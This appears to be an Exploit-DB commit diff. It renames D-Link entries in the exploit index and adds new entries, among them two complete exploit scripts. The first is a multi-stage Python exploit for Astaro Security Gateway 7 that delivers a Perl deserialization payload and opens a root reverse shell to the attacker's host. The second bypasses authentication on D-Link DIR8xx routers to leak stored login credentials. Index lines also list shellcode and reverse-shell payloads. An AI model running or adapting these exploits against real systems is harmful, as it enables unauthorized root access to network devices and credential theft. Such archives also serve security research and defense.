DB: 2017-09-16

6 new exploits

D-Link (Wireless Access Point) - (Fragmented UDP) Denial of Service
D-Link Wireless Access Point - Fragmented UDP Denial of Service

D-Link Router - UPNP Stack Overflow Denial of Service (PoC)
D-Link Devices - UPNP Stack Overflow Denial of Service (PoC)

Jungo DriverWizard WinDriver <= 12.4.0 - Kernel Pool Overflow
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation

MusicDaemon 0.0.3 - Remote Denial of Service / /etc/shadow Stealer (2)
MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)

D-Link (DWL Series) Access-Point 2.10na - Config Disclosure
D-Link DWL Series Access-Point 2.10na - Config Disclosure

Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access

D-Link Airspot DSA-3100 Gateway - Login_error.SHTML Cross-Site Scripting
D-Link Airspot DSA-3100 Gateway - 'Login_error.SHTML' Cross-Site Scripting
D-Link - Authentication.cgi Buffer Overflow (Metasploit)
D-Link - hedwig.cgi Buffer Overflow in Cookie Header (Metasploit)
D-Link Devices - Authentication.cgi Buffer Overflow (Metasploit)
D-Link Devices - 'hedwig.cgi' Buffer Overflow in Cookie Header (Metasploit)

D-Link - info.cgi POST Request Buffer Overflow (Metasploit)
D-Link Devices - 'info.cgi' POST Request Buffer Overflow (Metasploit)

D-Link - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)
D-Link Devices - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)

D-Link - Cookie Command Execution (Metasploit)
D-Link Devices - Cookie Command Execution (Metasploit)

D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure
D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure

Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)
D-Link DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)

Astaro Security Gateway 7 - Remote Code Execution

D-link DIR-600M - Cross-Site Request Forgery
D-Link DIR-600M - Cross-Site Request Forgery

DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery
D-Link DSL-2730U Wireless N 150 - Cross-Site Request Forgery
XYZ Auto Classifieds 1.0 - SQL Injection
Consumer Review Script 1.0 - SQL Injection
D-Link DIR8xx Routers - Leak Credentials
D-Link DIR8xx Routers - Root Remote Code Execution
D-Link DIR8xx Routers - Local Firmware Upload

files.csv

@@ -283,7 +283,7 @@ id,file,description,date,author,platform,type,port
 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service",2006-02-11,Firestorm,multiple,dos,0
 1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp' Denial of Service",2006-02-10,darkeagle,windows,dos,0
 1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0
-1496,platforms/hardware/dos/1496.c,"D-Link (Wireless Access Point) - (Fragmented UDP) Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0
+1496,platforms/hardware/dos/1496.c,"D-Link Wireless Access Point - Fragmented UDP Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0
 1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0
 1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0
 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0
@@ -368,7 +368,7 @@ id,file,description,date,author,platform,type,port
 2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 - (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0
 2051,platforms/linux/dos/2051.py,"Sendmail 8.13.5 - Remote Signal Handling (PoC)",2006-07-21,redsand,linux,dos,0
 2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)",2006-07-21,cocoruder,windows,dos,0
-2059,platforms/hardware/dos/2059.cpp,"D-Link Router - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos,0
+2059,platforms/hardware/dos/2059.cpp,"D-Link Devices - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos,0
 2073,platforms/multiple/dos/2073.c,"libmikmod 3.2.2 - (GT2 loader) Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",multiple,dos,0
 2124,platforms/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)",2006-08-07,ratboy,windows,dos,0
 2147,platforms/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)",2006-08-08,Elo,windows,dos,0
@@ -9234,7 +9234,7 @@ id,file,description,date,author,platform,type,port
 42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-06,mr_me,windows,local,0
 42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
 42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
-42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver <= 12.4.0 - Kernel Pool Overflow",2017-09-12,mr_me,windows,local,0
+42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-12,mr_me,windows,local,0
 42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
@@ -9416,7 +9416,7 @@ id,file,description,date,author,platform,type,port
 405,platforms/linux/remote/405.c,"XV 3.x - BMP Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0
 408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0
 409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
-413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
+413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)",2004-08-24,Tal0n,linux,remote,0
 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0
 418,platforms/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0
 421,platforms/windows/remote/421.c,"Gaucho 1.4 - Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",windows,remote,0
@@ -9703,7 +9703,7 @@ id,file,description,date,author,platform,type,port
 1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)",2006-05-21,kingcope,linux,remote,110
 1862,platforms/cgi/remote/1862.c,"iShopCart - 'vGetPost()' Remote Buffer Overflow (CGI)",2006-06-02,K-sPecial,cgi,remote,0
 1885,platforms/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - (POST) Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80
-1889,platforms/hardware/remote/1889.txt,"D-Link (DWL Series) Access-Point 2.10na - Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0
+1889,platforms/hardware/remote/1889.txt,"D-Link DWL Series Access-Point 2.10na - Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0
 1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow",2006-06-12,h07,windows,remote,0
 1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,windows,remote,0
 1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445
@@ -11782,7 +11782,7 @@ id,file,description,date,author,platform,type,port
 19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0
 19092,platforms/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0
 19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0
-19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
+19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
 19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0
 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
@@ -13985,7 +13985,7 @@ id,file,description,date,author,platform,type,port
 40382,platforms/multiple/remote/40382.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-14,"Gregory Draperi",multiple,remote,0
 27894,platforms/hardware/remote/27894.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - eventplayer get_image_info_abspath Parameter Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
 27902,platforms/linux/remote/27902.txt,"Prodder 0.4 - Arbitrary Shell Command Execution",2006-05-22,"RedTeam Pentesting",linux,remote,0
-27923,platforms/hardware/remote/27923.txt,"D-Link Airspot DSA-3100 Gateway - Login_error.SHTML Cross-Site Scripting",2006-05-30,"Jaime Blasco",hardware,remote,0
+27923,platforms/hardware/remote/27923.txt,"D-Link Airspot DSA-3100 Gateway - 'Login_error.SHTML' Cross-Site Scripting",2006-05-30,"Jaime Blasco",hardware,remote,0
 27931,platforms/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",multiple,remote,0
 27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution (Metasploit)",2013-08-29,Metasploit,windows,remote,0
 27940,platforms/windows/remote/27940.rb,"Mozilla Firefox - XMLSerializer Use-After-Free (Metasploit)",2013-08-29,Metasploit,windows,remote,0
@@ -14800,8 +14800,8 @@ id,file,description,date,author,platform,type,port
 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0
 33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double-Free Memory Corruption",2010-04-20,"Joel Johnson",linux,remote,0
 34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0
-33862,platforms/hardware/remote/33862.rb,"D-Link - Authentication.cgi Buffer Overflow (Metasploit)",2014-06-24,Metasploit,hardware,remote,80
-33863,platforms/hardware/remote/33863.rb,"D-Link - hedwig.cgi Buffer Overflow in Cookie Header (Metasploit)",2014-06-24,Metasploit,hardware,remote,80
+33862,platforms/hardware/remote/33862.rb,"D-Link Devices - Authentication.cgi Buffer Overflow (Metasploit)",2014-06-24,Metasploit,hardware,remote,80
+33863,platforms/hardware/remote/33863.rb,"D-Link Devices - 'hedwig.cgi' Buffer Overflow in Cookie Header (Metasploit)",2014-06-24,Metasploit,hardware,remote,80
 33865,platforms/linux/remote/33865.rb,"Alienvault Open Source SIEM (OSSIM) - av-centerd Command Injection (Metasploit)",2014-06-24,Metasploit,linux,remote,40007
 33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,hardware,remote,0
 33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,cp77fk4r,multiple,remote,0
@@ -14842,9 +14842,9 @@ id,file,description,date,author,platform,type,port
 34048,platforms/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 - 'pbx/gate' Cross-Site Request Forgery",2010-05-26,"John Leitch",multiple,remote,0
 34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal",2010-05-27,"John Leitch",windows,remote,0
 34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request (SEH)",2014-07-14,"Revin Hadi Saputra",windows,remote,0
-34063,platforms/hardware/remote/34063.rb,"D-Link - info.cgi POST Request Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80
+34063,platforms/hardware/remote/34063.rb,"D-Link Devices - 'info.cgi' POST Request Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80
 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80
-34065,platforms/hardware/remote/34065.rb,"D-Link - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,hardware,remote,1900
+34065,platforms/hardware/remote/34065.rb,"D-Link Devices - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,hardware,remote,1900
 34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0
 34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0
 34088,platforms/android/remote/34088.html,"Boat Browser 8.0/8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0
@@ -15291,7 +15291,7 @@ id,file,description,date,author,platform,type,port
 37599,platforms/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free (Metasploit)",2015-07-13,Metasploit,windows,remote,0
 37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia < 11.0.12 - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,617
 37611,platforms/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,windows,remote,0
-37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution (Metasploit)",2015-07-17,Metasploit,hardware,remote,0
+37628,platforms/hardware/remote/37628.rb,"D-Link Devices - Cookie Command Execution (Metasploit)",2015-07-17,Metasploit,hardware,remote,0
 37647,platforms/multiple/remote/37647.txt,"Apache Struts 2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0
 37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0
 37688,platforms/php/remote/37688.txt,"PHP 5.3.11/5.4.0RC2 - 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0
@@ -15637,14 +15637,14 @@ id,file,description,date,author,platform,type,port
 40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8/9/10/11 / IIS / CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
 40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
 40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
-40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
+40735,platforms/hardware/remote/40735.txt,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40736,platforms/hardware/remote/40736.txt,"NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40737,platforms/hardware/remote/40737.sh,"NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40738,platforms/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547
 40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0
 40778,platforms/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,windows,remote,0
-40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80
+40805,platforms/multiple/remote/40805.rb,"D-Link DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80
 40813,platforms/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",hardware,remote,0
 40824,platforms/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",multiple,remote,80
 40830,platforms/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
@@ -15827,6 +15827,7 @@ id,file,description,date,author,platform,type,port
 42723,platforms/windows/remote/42723.rb,"haneWIN DNS Server 1.5.3 - Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,53
 42724,platforms/windows/remote/42724.rb,"KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,12401
 42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69
+42726,platforms/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",hardware,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37833,7 +37834,7 @@ id,file,description,date,author,platform,type,port
 41304,platforms/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
 41305,platforms/php/webapps/41305.txt,"CodePaul ClipMass - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
 41306,platforms/php/webapps/41306.txt,"Video Subscription - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
-41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
+41299,platforms/hardware/webapps/41299.html,"D-Link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
 41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
 41308,platforms/php/webapps/41308.txt,"WordPress Plugin Insert PHP 3.3.1 - PHP Code Injection",2017-02-09,CrashBandicot,php,webapps,0
 41309,platforms/windows/webapps/41309.html,"SonicDICOM PACS 2.3.2 - Cross-Site Scripting",2017-02-11,LiquidWorm,windows,webapps,0
@@ -37955,7 +37956,7 @@ id,file,description,date,author,platform,type,port
 41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
 41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
 41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
-41478,platforms/hardware/webapps/41478.txt,"DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",hardware,webapps,0
+41478,platforms/hardware/webapps/41478.txt,"D-Link DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",hardware,webapps,0
 41492,platforms/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
 41482,platforms/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",xml,webapps,0
 41483,platforms/php/webapps/41483.html,"WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting",2017-03-01,"Edwin Molenaar",php,webapps,80
@@ -38505,3 +38506,8 @@ id,file,description,date,author,platform,type,port
 42715,platforms/php/webapps/42715.txt,"PTC KSV1 Script 1.7 - 'type' Parameter SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
 42716,platforms/php/webapps/42716.txt,"Theater Management Script - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
 42717,platforms/php/webapps/42717.txt,"Justdial Clone Script - 'fid' Parameter SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
+42727,platforms/php/webapps/42727.txt,"XYZ Auto Classifieds 1.0 - SQL Injection",2017-09-12,8bitsec,php,webapps,0
+42728,platforms/php/webapps/42728.txt,"Consumer Review Script 1.0 - SQL Injection",2017-09-12,8bitsec,php,webapps,0
+42729,platforms/hardware/webapps/42729.py,"D-Link DIR8xx Routers - Leak Credentials",2017-09-12,embedi,hardware,webapps,0
+42730,platforms/hardware/webapps/42730.py,"D-Link DIR8xx Routers - Root Remote Code Execution",2017-09-12,embedi,hardware,webapps,0
+42731,platforms/hardware/webapps/42731.sh,"D-Link DIR8xx Routers - Local Firmware Upload",2017-09-12,embedi,hardware,webapps,0

platforms/hardware/remote/42726.py

@@ -0,0 +1,127 @@
+#!/usr/bin/python
+
+# Astaro Security Gateway v7 - Unauthenticated Remote Code Execution
+# Exploit Authors: Jakub Palaczynski and Maciej Grabiec
+# Tested on versions: 7.500 and 7.506
+# Date: 13.12.2016
+# Vendor Homepage: https://www.sophos.com/
+# CVE: CVE-2017-6315
+
+import socket
+import sys
+import os
+import threading
+import subprocess
+import time
+
+# print help or assign arguments
+if len(sys.argv) != 3:
+    sys.stderr.write("[-]Usage: python %s <our_ip> <remote_ip:port>\n" % sys.argv[0])
+    sys.stderr.write("[-]Exemple: python %s 192.168.1.1 192.168.1.2:4444\n" % sys.argv[0])
+    sys.exit(1)
+
+lhost = sys.argv[1] # our ip address
+rhost = sys.argv[2] # ip address and port of vulnerable ASG v7
+
+# for additional thread to send requests in parallel
+class requests (threading.Thread):
+    def run(self):
+        print 'Sending requests to trigger vulnerability.'
+        time.sleep(5)
+        # first request to clear cache
+        os.system('curl -s -m 5 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':81"}\' -k > /dev/null')
+        # second request to trigger reverse connection
+        os.system('curl -s -m 20 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':80"}\' -k > /dev/null')
+
+# function that creates socket
+def create_socket(port):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    sock.bind(('0.0.0.0', port))
+    sock.listen(10)
+    conn, addr = sock.accept()
+    return sock, conn, addr
+
+# function to receive data from socket
+def receive(conn):
+    sys.stdout.write(conn.recv(1024))
+    sys.stdout.flush()
+    sys.stdout.write(conn.recv(1024))
+    sys.stdout.flush()
+
+# Thanks to Agarri: http://www.agarri.fr/docs/PoC_thaw_perl58.pl
+# This script creates serialized object that makes reverse connection and executes everything what it receives on a socket
+file = """
+#!/usr/bin/perl
+
+use strict;
+use MIME::Base64 qw( encode_base64 );
+use Storable qw( nfreeze );
+use LWP::UserAgent;
+
+my $package_name = "A" x 252;
+my $pack = qq~{ package $package_name; sub STORABLE_freeze { return 1; } }~;
+eval($pack);
+
+my $payload = qq~POSIX;eval('sleep(10);use IO::Socket::INET;\$r=IO::Socket::INET->new(\"""" + lhost + """:443");if (\$r) {eval(<\$r>);}');exit;~;
+
+my $padding = length($package_name) - length($payload);
+$payload = $payload . (";" x $padding);
+my $data = bless { ignore => 'this' }, $package_name;
+my $frozen = nfreeze($data);
+$frozen =~ s/$package_name/$payload/g;
+my $encodedSize = length($frozen);
+my $pakiet = print(pack("N", $encodedSize), $frozen);
+print "$frozen";
+"""
+
+# save file, run perl script and save our serialized payload
+f = open("payload.pl", "w")
+f.write(file)
+f.close()
+
+serialized = os.popen("perl ./payload.pl").read()
+os.remove("./payload.pl")
+
+# start thread that sends requests
+thread = requests()
+thread.start()
+
+# open socket that receives connection from index
+sock, conn, addr = create_socket(80)
+print 'Received connection from: ' + addr[0] + ':' + str(addr[1]) + '.'
+print 'Sending 1st stage payload.'
+data = conn.recv(256)
+# say hello to RPC client
+conn.sendall(data)
+data = conn.recv(256)
+# send serialized object that initiates connect back connection and executes everything what it receives on a socket
+conn.sendall(serialized)
+sock.close()
+
+# create second socket that receives connection from index and sends additional commands
+sock, conn, addr = create_socket(443)
+print 'Sending 2nd stage payload.'
+# send commands that exploit confd (running with root permissions) which is running on localhost - the same exploitation as for first stage
+conn.sendall('sleep(10);use IO::Socket::INET;my $s = new IO::Socket::INET(PeerHost => "127.0.0.1",PeerPort => "4472",Proto => "tcp");$s->send("\\x00\\x00\\x00\\x1d\\x05\\x06\\x02\\x00\\x00\\x00\\x04\\x0a\\x04\\x70\\x72\\x70\\x63\\x0a\\x04\\x30\\x2e\\x30\\x31\\x0a\\x06\\x73\\x79\\x73\\x74\\x65\\x6d\\x0a\\x00");my $a;$s->recv($a,1024);$s->send("' + "\\x" + "\\x".join("{:02x}".format(ord(c)) for c in serialized) + '");$s->recv($a,1024);$s->close();\n')
+sock.close()
+
+# create socket that receives connection from confd and sends commands to get reverse shell
+sock, conn, addr = create_socket(443)
+print 'Sending 3rd stage payload.'
+# send reverse shell payload
+conn.sendall('sleep(20);use Socket;$i="' + lhost + '";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\n')
+sock.close()
+
+# create socket to receive shell with root permissions
+print '\nNow you need to wait for shell.'
+sock, conn, addr = create_socket(443)
+receive(conn)
+while True:
+    cmd = raw_input("")
+    if cmd == 'exit':
+        break
+    else:
+        conn.send(cmd + "\n")
+        receive(conn)
+sock.close()

platforms/hardware/webapps/42729.py

@@ -0,0 +1,24 @@
+# phpcgi is responsible for processing requests to .php, .asp and .txt pages. Also, it checks whether a user is authorized or not. Nevertheless, if a request is crafted in a proper way, an attacker can easily bypass authorization and execute a script that returns a login and password to a router.
+# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
+# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/phpcgi.py
+
+import requests as rq
+
+EQ = "%3d"
+IP = "192.168.0.1"
+PORT = "80"
+
+def pair(key, value):
+    return "%0a_POST_" + key + EQ + value
+
+headers_multipart = {
+    'CONTENT-TYPE' : 'application/x-www-form-urlencoded'
+}
+
+url = 'http://{ip}:{port}/getcfg.php'.format(ip=IP, port=PORT)
+auth = "%0aAUTHORIZED_GROUP%3d1"
+data = "A=A" + pair("SERVICES", "DEVICE.ACCOUNT") + auth
+
+print(rq.get(url, data=data, headers=headers_multipart).text)
+
+

